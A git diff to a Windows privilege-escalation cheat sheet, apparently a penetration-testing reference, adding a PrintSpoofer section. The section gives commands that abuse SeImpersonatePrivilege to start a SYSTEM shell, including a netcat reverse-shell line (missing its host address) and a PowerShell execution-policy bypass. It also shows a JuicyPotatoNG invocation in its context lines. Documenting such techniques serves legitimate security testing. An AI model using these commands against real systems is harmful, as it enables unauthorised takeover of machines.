diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index fed43ff..365e3db 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -49,6 +49,7 @@ * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver)) * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw)) + * [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug))) * [EoP - Privileged File Write](#eop---privileged-file-write) * [DiagHub](#diaghub) * [UsoDLLLoader](#usodllloader) @@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic ``` +### PrintSpoofer (Printer Bug) + +> this work if SeImpersonatePrivilege is enabled + +* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0 + +```powershell +# run nc -lnvp 443 then : +.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 443 -e cmd" +# without listener +.\PrintSpoofer64.exe -i -c cmd +# Via RPD +.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass" +``` + ## EoP - Privileged File Write ### DiagHub